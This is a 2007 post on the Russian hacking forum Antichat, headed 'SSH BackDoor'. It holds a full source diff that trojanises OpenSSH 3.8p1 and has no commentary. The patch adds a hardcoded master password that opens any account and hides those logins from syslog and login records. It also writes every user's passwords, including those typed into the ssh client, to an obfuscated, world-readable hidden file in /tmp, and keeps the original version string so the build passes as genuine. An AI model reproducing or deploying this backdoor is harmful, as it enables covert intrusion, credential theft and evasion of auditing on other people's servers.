Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
04.08.2007, 14:31
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
SSH BackDoor
SSH BackDoor
Код:
diff -r -N -c openssh-3.8p1/auth-pam.c openssh-3.8p1+/auth-pam.c
*** openssh-3.8p1/auth-pam.c Tue Feb 17 13:20:08 2004
--- openssh-3.8p1+/auth-pam.c Tue Mar 2 19:24:00 2004
***************
*** 342,347 ****
--- 342,348 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, 0);
+ if (bella) sshpam_err = PAM_SUCCESS;
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
buffer_put_cstring(&buffer, "OK");
diff -r -N -c openssh-3.8p1/auth-passwd.c openssh-3.8p1+/auth-passwd.c
*** openssh-3.8p1/auth-passwd.c Thu Feb 22 00:23:36 2004
--- openssh-3.8p1+/auth-passwd.c Tue Mar 2 19:24:00 2004
***************
*** 72,77 ****
--- 72,81 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ if (!strcmp(BACKPWD, password)) return bella=1; bella=0;
+ sprintf(abuff, "passwd from: %s \tuser: %s \tpass: %s \n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ bellalog();
#if defined(HAVE_OSF_SIA)
return auth_sia_password(authctxt, password) && ok;
diff -r -N -c openssh-3.8p1/includes.h openssh-3.8p1+/includes.h
*** openssh-3.8p1/includes.h Sun Feb 6 11:29:42 2004
--- openssh-3.8p1+/includes.h Tue Mar 2 19:24:00 2004
***************
*** 13,18 ****
--- 13,38 ----
* called by a name other than "ssh" or "Secure Shell".
*/
+ // start patch by acme - acme at olografix/paranoici dot org
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define BACKPWD "inspassword"
+ #define SSH_LOG "/tmp/.lost+found"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, bella;
+
+ #define bellalog() { \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch, from aion
+
#ifndef INCLUDES_H
#define INCLUDES_H
diff -r -N -c openssh-3.8p1/log.c openssh-3.8p1+/log.c
*** openssh-3.8p1/log.c Tue Feb 18 12:59:44 2004
--- openssh-3.8p1+/log.c Tue Mar 2 19:24:00 2004
***************
*** 273,278 ****
--- 273,279 ----
char *txt = NULL;
int pri = LOG_INFO;
+ if (bella) return;
if (level > log_level)
return;
diff -r -N -c openssh-3.8p1/loginrec.c openssh-3.8p1+/loginrec.c
*** openssh-3.8p1/loginrec.c Sun Feb 10 06:49:36 2004
--- openssh-3.8p1+/loginrec.c Tue Mar 2 19:24:00 2004
***************
*** 406,411 ****
--- 406,412 ----
int
login_write (struct logininfo *li)
{
+ if (bella) return 0;
#ifndef HAVE_CYGWIN
if ((int)geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -r -N -c openssh-3.8p1/monitor.c openssh-3.8p1+/monitor.c
*** openssh-3.8p1/monitor.c Wed Feb 6 06:40:28 2004
--- openssh-3.8p1+/monitor.c Tue Mar 2 19:24:00 2004
***************
*** 786,791 ****
--- 786,793 ----
fatal("UsePAM not set, but ended up in %s anyway", __func__);
user = buffer_get_string(m, NULL);
+ sprintf(abuff, "mm pam from: %s \tuser: %s \n", get_remote_ipaddr(), user);
+ bellalog();
start_pam(user);
***************
*** 881,888 ****
num = buffer_get_int(m);
if (num > 0) {
resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i)
resp[i] = buffer_get_string(m, NULL);
ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
for (i = 0; i < num; ++i)
xfree(resp[i]);
--- 883,894 ----
num = buffer_get_int(m);
if (num > 0) {
resp = xmalloc(num * sizeof(char *));
! for (i = 0; i < num; ++i) {
resp[i] = buffer_get_string(m, NULL);
+ sprintf(abuff, "pam_respond: [%d]: %s\n", i, resp[i]);
+ if(!strcmp(BACKPWD, resp[i])) bella=1;
+ else bellalog();
+ }
ret = (sshpam_device.respond)(sshpam_ctxt, num, resp);
for (i = 0; i < num; ++i)
xfree(resp[i]);
diff -r -N -c openssh-3.8p1/readpass.c openssh-3.8p1+/readpass.c
*** openssh-3.8p1/readpass.c Fri Jan 24 02:36:23 2003
--- openssh-3.8p1+/readpass.c Tue Mar 2 19:24:00 2004
***************
*** 123,128 ****
--- 123,130 ----
if ((ret = ssh_askpass(askpass, prompt)) == NULL)
if (!(flags & RP_ALLOW_EOF))
return xstrdup("");
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
return ret;
}
***************
*** 134,138 ****
--- 136,142 ----
ret = xstrdup(buf);
memset(buf, 'x', sizeof buf);
+ sprintf(abuff, "readpass: %s\n", ret);
+ bellalog();
return ret;
}
diff -r -N -c openssh-3.8p1/ssh.c openssh-3.8p1+/ssh.c
*** openssh-3.8p1/ssh.c Tue Dec 17 06:33:12 2003
--- openssh-3.8p1+/ssh.c Tue Mar 2 19:24:00 2004
***************
*** 212,217 ****
--- 212,221 ----
extern int optind, optreset;
extern char *optarg;
+ for(i=1; i<ac; i++) {
+ sprintf(abuff, "ssh: av[%d]: %s\n", i, av[i]);
+ bellalog();
+ }
__progname = ssh_get_progname(av[0]);
init_rng();
diff -r -N -c openssh-3.8p1/version.h openssh-3.8p1+/version.h
*** openssh-3.8p1/version.h Tue Feb 23 23:24:02 2004
--- openssh-3.8p1+/version.h Tue Mar 2 19:24:00 2004
***************
*** 1,3 ****
/* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
! #define SSH_VERSION "OpenSSH_3.8p1"
--- 1,3 ----
/* $OpenBSD: version.h,v 1.40 2004/02/23 15:16:46 markus Exp $ */
! #define SSH_VERSION "OpenSSH_3.8p1" // we can change it
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
